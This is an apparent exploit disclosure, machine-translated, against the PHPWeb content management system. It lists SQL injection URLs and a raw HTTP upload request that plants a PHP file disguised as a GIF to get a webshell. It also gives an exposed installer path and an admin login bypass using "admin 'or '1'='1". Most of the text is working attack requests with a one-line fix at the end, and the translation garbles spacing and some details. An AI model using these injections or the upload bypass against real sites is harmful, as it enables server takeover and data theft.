# Author: lostowlf home: hi.baidu.com/nginxshell
Test:
* ***** Sqlinjection *******
Http://www.phpweb.net/down/class/index.php? Myord = 1 {sqlinjection}
Http://www.phpweb.net/photo/clas... mp; key = & myord = 1 {sqlinjection}
* *********** Getshell ********
POST/kedit/upload_cgi/upload. php HTTP/1.0"
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml + xml, application/vnd. ms-xpsdocument, application/x-ms-xbap, application/x-ms-application ,*/*
Referer: http://phpweb.net/news/admin/new... p; pid = all & page =
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary = --------------------------- 7db516c0118
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1;. net clr 1.1.4322;. net clr 2.0.50727;. net clr 3.0.04506.30)
Host: lib.jlnu.edu.cn
Proxy-Connection: Keep-Alive
Cookie: CODEIMG = 6878; SYSZC = Taobao; SYSUSER = wlf; SYSNAME = % E7 % 8E % 8B % E7 % AB % 8B % E5 % B3 % B0; SYSUSERID = 15; running M = 1318373657-D1 F $ M (R3 _ 8 {3 U. V
Content-Length: 6620
----------------------------- 7db516c0118
Content-Disposition: form-data; name = "fileName"
2011101213183700002005.php0000.jpg
----------------------------- 7db516c0118
Content-Disposition: form-data; name = "attachPath"
News/pics/
----------------------------- 7db516c0118
Content-Disposition: form-data; name = "fileData"; filename = "C: \ 6.gif"
Content-Type: image/gif
Gif89a
');?>
* ******** Install file :**********
Http://www.bkjia.com/base/install/
* ******** Admin ********
Www.2cto.com/admin. php
Username: admin 'or '1' = '1
Username: admin 'or '1' = '1
Www.2cto.com solution: Filter and upload vulnerability fix. Forget it. Change the program.